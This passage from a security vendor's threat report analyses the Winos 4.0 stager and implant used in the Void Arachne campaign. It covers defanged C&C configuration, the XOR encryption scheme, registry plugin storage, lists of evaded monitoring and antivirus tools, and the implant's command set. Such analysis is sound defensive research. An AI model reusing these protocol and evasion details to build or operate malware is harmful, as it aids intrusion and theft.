2962bb303b949e4a0826c723ee4aee2df8cb0806653a8ca6daaa67fd06f37e6f Compiler
Microsoft Visual C/C++ Compilation time 2023-05-23 09:24:06 Size 109 KB Type DLL
The second stage loader discussed earlier executes the Winos stager payload,
上线模块.dll/exe (which translates to Online Module.dll/exe). This module can be
generated in both EXE and DLL formats. In this campaign, the attacker delivers a
DLL implant. This module is responsible for downloading and executing the main
implant, 登录模块.dll (which translates to LoginModule.dll), on an infected system.
Upon execution, the stager reads and initializes its configuration. Notably, the
configuration is in cleartext but is arranged in reverse order. The following is
the fixed configuration setup:
|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1|cl:1|fz:默认|bb:1.0|bz:2024.
4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|
Table 5 contains the stager’s configuration values and their descriptions.
Config Description Value p1 First C&C address 127.0.0.1 o1 First C&C port 443 t1
Communication protocol TCP/UDP 1 (TCP) p2 Second C&C address
103[.]214[.]147[.]14[.]webcamcn[.]xyz o2 Second C&C port 80 t2 Communication
protocol TCP/UDP 1 (TCP) p3 Third C&C address: Backup address in case p1 and p2
fail 103[.]214[.]147[.]14[.]webcamcn[.]xyz o3 Third port 80 t3 Communication
protocol TCP/UDP 0 (UDP) dd Implant execution delay in seconds 1 cl C&C
communication interval (beaconing) in seconds 1 fz Grouping 默认 (Default) bb
Version 1.0 bz Comment: Default value is implant generation time 2024. 4.18 jp
Keylogger 0 sx Anti-VM 0 bh End bluescreen 0 ll Antitraffic monitoring 0 dl
Entry point 0 sh Process daemon 0 kl Process hollowing 0 bd - 0
Table 5. Winos 4.0 stager configuration values and descriptions
To communicate with its C&C server, the malware first needs to generate an
encryption key to secure the communication. To generate this key, the malware
calls the timeGetTime() Windows API function, which returns the system time in
milliseconds, and appends “00 00 00 00 ca 00” to it. The data that needs to be
transferred is then encrypted with this key and appended after the key.
Figure 28 is an example of an initial handshake between the stager and the C&C
server. The malware encrypts and sends the hardcoded value “04 00” to its C&C
server to indicate that this initial packet contains the key. The server then
uses this session key for future communications.
Figure 28. Winos 4.0 stager initial packet–encryption key exchange
The encryption algorithm begins by preparing a block of data and a key,
adjusting the buffer to ensure that there is sufficient space to work with both.
The key is then appended to the beginning of the data that needs to be
encrypted. The algorithm proceeds with the encryption process, which involves a
loop that processes each byte of data. For each byte, a specific byte from the
key is selected and transformed by taking its modulus with a hardcoded value
(0x1C8) and then adding another hardcoded value (0x36) to it. This transformed
key is then used to XOR with the current byte of the data, resulting in the
encrypted byte that replaces the original byte in the data. Every ten bytes, the
algorithm resets the pointer to the beginning of the key, ensuring that the key
is reused cyclically.
It should be noted that, based on our analysis, the value 0x1C8 remained the
same in all the samples used in this campaign and several other attacks.
However, we have observed that some variants found in the wild use different
values, such as 0x7C5, indicating that this value might change from sample to
sample. However, the value 0x36 remained the same in all the variants we
analyzed.
Figure 29. Winos 4.0 stager data encryption
Next, the C&C server responds with a magic value of “04” and a unique 16-byte
identifier in UTF-16 format. In some Winos variants, this identifier is the MD5
hash of the DLL module that will be downloaded. Figure 30 is an example of the
C&C server response to network traffic.
Figure 30. C&C server response with a unique identifier to the initial packet
Figure 31 shows a decrypted packet data section.
Figure 31. Decrypted C&C response with a unique identifier to the initial packet
The stager then sends the next-stage payload plugin, named 登录模块.dll
(LoginModule.dll), to the C&C server.
Figure 32. The Winos 4.0 stager sends the next stager module name to the C&C
server (encrypted packet)
Figure 33 shows the decrypted packet data section.
Figure 33. The Winos stager sends the next stager module name to the C&C
(cleartext)
The C&C server response contains the following information:
* Module name
* Module hash
* Binary loader shellcode
* DLL module binary file
The stager then saves the decrypted C&C server response (the plugin and its
configuration) into the Windows Registry. It uses the name
"d33f351a4aeea5e608853d1a56661059" and stores it under the key path
HKEY_CURRENT_USER\Console\0 for 32-bit plugins or HKEY_CURRENT_USER\Console\1
for 64-bit plugins.
Figure 34. The Winos stager store module is sent by the C&C server to the
registry.
Finally, to execute the module, the stager locates the shellcode section within
the response received from the C&C server at offset 0xA44 and transfers control
to the shellcode.
Figure 35. Module shellcode DLL loader
WINOS MAIN IMPLANT ANALYSIS
File name 登录模块.dll (LoginModule.dll) Magic PE32 executable (DLL) SHA256
78f86c3581ae893e17873e857aff0f0a82dcaed192ad82cd40ad269372366590 Compiler
Microsoft Visual C/C++ Compilation time 2023-05-23 09:24:23 UTC Size 195.00 KB
(199680 bytes) Type DLL
The 登录模块.dll (LoginModule.dll) is a fundamental component of Winos 4.0, serving
as the core plugin manager for the system. This module is responsible for
handling every action and command executed by the operator, which are
transmitted via the C&C server as DLL plugins. These plugins extend the
functionality of the implant.
Upon receiving the response from the C&C server, the implant stores these DLL
plugins in the Windows registry paths HKEY_CURRENT_USER\Console\0 for 32-bit
systems or HKEY_CURRENT_USER\Console\1 for 64-bit systems. Subsequently, the
implant loads and uses these plugins to perform various tasks, enhancing its
operational capabilities. This modular approach allows for a highly flexible and
extensible framework, enabling the efficient execution of diverse functions as
required by the operator.
Once the 登录模块.dll (LoginModule.dll) plugin is downloaded, the execution of this
module is based on the previously mentioned configuration. The malware creates a
thread to collect clipboard data and keystrokes. It also employs a specific
mutex for this thread, which is named 测试备注 (Test Notes).
Figure 36. Code that shows mutex creation and clipboard data retrieval
Next, the malware chooses one of the three available C&C configurations. Before
initiating the socket, it checks whether the antianalysis feature is configured
to run. If this feature is configured, the malware verifies the presence of
monitoring software by inspecting the window titles of running processes. If
such software is detected, the malware enters sleep mode.
Figure 37. Initializing socket with the C&C server
Below is a list of monitoring software that the malware detects:
* 流量(Flow)
* TaskExplorer
* Wireshark
* Fiddler
* Process
* ApateDNS
* CurrPorts
* 任务管理器(Task manager)
* 火绒(Tinder)
* 提示符(Prompt)
* Malwarebytes
* Port
* 资源监视器(Resource monitor)
* Capsa
* TCPEye
* Metascan
* 网络分析(Network analysis)
* Sniff
The malware collects system information from an infected machine, including the
IP address, computer name, antivirus software, operating system details, and
hardware ID (HWID).
Figure 38. System information-gathering code snippet
Table 6 shows a list of targeted antivirus (AV) software.
AV vendor Targeted AV process 360 Total Security 360Safe.exe | 360Tray.exe |
360tray.exe | ZhuDongFangYu.exe | 360sd.exe 金山(Jinshan) Kxetray.exe |
KSafeTray.exe | kscan.exe | kwsprotect64.exe | kxescore.exe QQ QQPCRTP.exe |
QMDL.exe | QMPersonalCenter.exe | QQPCPatch.exe | QQPCRealTimeSpeedup.exe |
QQPCTray.exe | QQRepair.exe Baidu BaiduSd.exe | baiduSafeTray.exe 江民(Jiang Min)
KvMonXP.exe | RavMonD.exe QuickHeal QUHLPSVC.EXE Microsoft MSE mssecess.exe
Comodo cfp.exe DR.WEB SPIDer.exe Outpost acs.exe 安博士V3 (Dr. An V3) V3Svc.exe
韩国胶囊(Korean capsules) AYAgent.aye AVG avgwdsvc.exe F-Secure f-secure.exe
卡巴(Kaba) avp.exe avpui.exe McAfee Mcshield.exe NOD32 egui.exe 可牛(Ke Niu)
knsdtray.exe Trend Micro TMBMSRV.exe 小红伞(Red Umbrella) avcenter.exe Norton
rtvscan.exe Avast ashDisp.exe Panda Antivirus Titanium remupd.exe BitDefender
vsserv.exe PSafe PSafeSysTray.exe Ad-watch ad-watch.exe K7 K7TSecurity.exe
UnThreat UnThreat.exe
Table 6. List of targeted antivirus software
Next, the malware employs the encryption algorithm that we’ve previously
discussed to encrypt all collected data. Using the timeGetTime() Windows API
function, a new key will be generated to encrypt the collected data, which is
different from the key used during the stager’s initial request. The malware
appends the hardcoded value “06 00” to the encryption key to indicate that this
request contains collected data. Unlike the stager, LoginModule.dll doesn’t send
the key in a separate request, instead, it prefixes the value of the key to the
collected data and sends this encrypted request to the C&C server.
Figure 39. Code snippet showing the encryption and transmission of collected
information to the C&C server
Figure 40 shows the initial packet that the malware sends.
Figure 40. Initial packet sent by登录模块.dll (LoginModule.dll)
Figure 41.登录模块.dll (LoginModule.dll) decrypted initial traffic
The malware then begins to listen for incoming commands from the C&C server. It
can execute a variety of tasks, including loading additional plugins, capturing
screenshots, and clearing system logs. These functions are managed and executed
through controlled switch statements, ensuring precise and efficient handling of
each instruction.
Table 7 lists the malware’s supported functionalities.
Commands Description 0 Load plugins 1 Load the plugin and update the registry 2
Terminate the connection 3 Send the active window information and capture a
screenshot 4 Capture a screenshot 5 Execute file and commands 6 Download a file
from the given URL and execute it 7 Modify the registry value of specific keys
and, if the key doesn’t exist, create it 8 Check whether a process with the
provided name exists on the system by enumerating the list of running processes
9 N/A 10 Capture a screenshot 11 Clear system logs: Application, security, and
system 12 Restart the process 13 Terminate the process 14 Logout from the system
15 Restart the system 16 Shutdown the system 17 Change the default plugin
loading method 18 Update configuration settings 19 Create a new C&C thread and
perform system information collection 100 Set the value
of IpDatespecial registry 101 Remove the value of IpDatespecial registry
Table 7. A list of the malware’s supported functionalities
CONCLUSION
In the scope of our research, we conducted an analysis of a Void Arachne
campaign that targets the Chinese-speaking demographic. Using SEO poisoning and
widely used messaging applications such as Telegram, the Void Arachne threat
group has potentially reached a substantial Chinese-speaking demographic as well
as the broader East Asian community through the dissemination of malicious MSI
files.
As is the case with Void Arachne’s campaign, threat actors abused the great
public interest in AI technologies to deliver malware. Our investigation
revealed that Void Arachne promoted compromised MSI files embedded with
nudifiers and deepfake pornography-generating software, intending to infect
unsuspecting users. Furthermore, the group advertised corrupted AI voice and
facial technologies, frequently exploited in virtual kidnapping schemes. The
proliferation of these artificial technologies has prompted concerns regarding
potential misuse, particularly evident in sextortion and virtual kidnapping
schemes that can lead to heartbreaking consequences. In its commitment to
safeguarding the general public’s online well-being, Trend Micro has curated
comprehensive resources designed to educate the community on identifying,
preventing, and addressing sextortion attacks. In the event of falling victim to
sextortion or virtual kidnapping, the prompt reporting of the incident to
relevant authorities, such as the Internet Crime Complaint Center (IC3), is
strongly recommended.
Throughout 2024, we have seen an increase in malicious MSI files, such as in a
DarkGate campaign that exploited the Microsoft Windows Internet Shortcut
SmartScreen Bypass Vulnerability (CVE-2024-21412). Individuals are strongly
advised to check the source of MSI files and only download them from trusted
sources. As previously discussed, MSI files are bundled installers, which mean
that malicious software as well as zero-day exploits can be bundled alongside
legitimate software. These malicious MSI files pose a significant threat to
organizations as they may act as a backdoored installer and poison the software
installer supply chain.
Organizations can protect themselves from these kinds of attacks with Trend
Vision One, which enables security teams to continuously identify attack
surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision
One helps organizations prioritize and address potential risks, including
vulnerabilities. It considers critical factors, such as the likelihood and
impact of potential attacks, and offers a range of prevention, detection, and
response capabilities. This is all backed by advanced threat research, threat
intelligence, and AI, which helps reduce the time taken to detect, respond, and
remediate issues. Ultimately, Trend Vision One can help improve the overall
security posture and effectiveness of an organization, including defending an
organization against zero-day attacks.
When faced with uncertain intrusions, behaviors, and routines, organizations
should assume that their system is already compromised or breached and work to
immediately isolate affected data or toolchains. With a broader perspective and
rapid response, organizations can address breaches and protect their remaining
systems, especially with technologies such as Trend Micro™ Endpoint Security™
and Trend Micro Network Security, as well as comprehensive security solutions
such as Trend Micro™ XDR, which can detect, scan, and block malicious content
across the modern threat landscape.
The complete list of indicators of compromise (IoCs) can be found here.
Tags
APT & Targeted Attacks | Endpoints | Malware | Research | Articles, News,
Reports
AUTHORS
* Peter Girnus
Sr. Threat Researcher
* Aliakbar Zahravi
Staff Researcher
* Ahmed Mohamed Ibrahim
Malware Researcher
Contact Us
Subscribe
RELATED ARTICLES
* Not Just Another 100% Score: MITRE ENGENUITY ATT&CK
* Noodle RAT Reviewing the Backdoor Used by Chinese-Speaking Groups
* Op Poisoned News Targets Hong Kong Users with Malware in Mobile News Links
See all articles
Try our services free for 30 days
* Start your free trial today
*
*
*
*
*
RESOURCES
* Blog
* Newsroom
* Threat Reports
* DevOps Resource Center
* CISO Resource Center
* Find a Partner
SUPPORT
* Business Support Portal
* Contact Us
* Downloads
* Free Trials
*
*
ABOUT TREND
* About Us
* Careers
* Locations
* Upcoming Events
* Trust Center
*
Country Headquarters
Trend Micro - United States (US)
225 East John Carpenter Freeway
Suite 1500
Irving, Texas 75062
Phone: +1 (817) 569-8900
Select a country / region
United States expand_more
close
THE AMERICAS
* United States
* Brasil
* Canada
* México
MIDDLE EAST & AFRICA
* South Africa
* Middle East and North Africa
EUROPE
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
ASIA & PACIFIC
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Privacy | Legal | Accessibility | Site map
Copyright ©2024 Trend Micro Incorporated. All rights reserved
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
✓
Danke für das Teilen!
AddToAny
Mehr…
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
BDOW!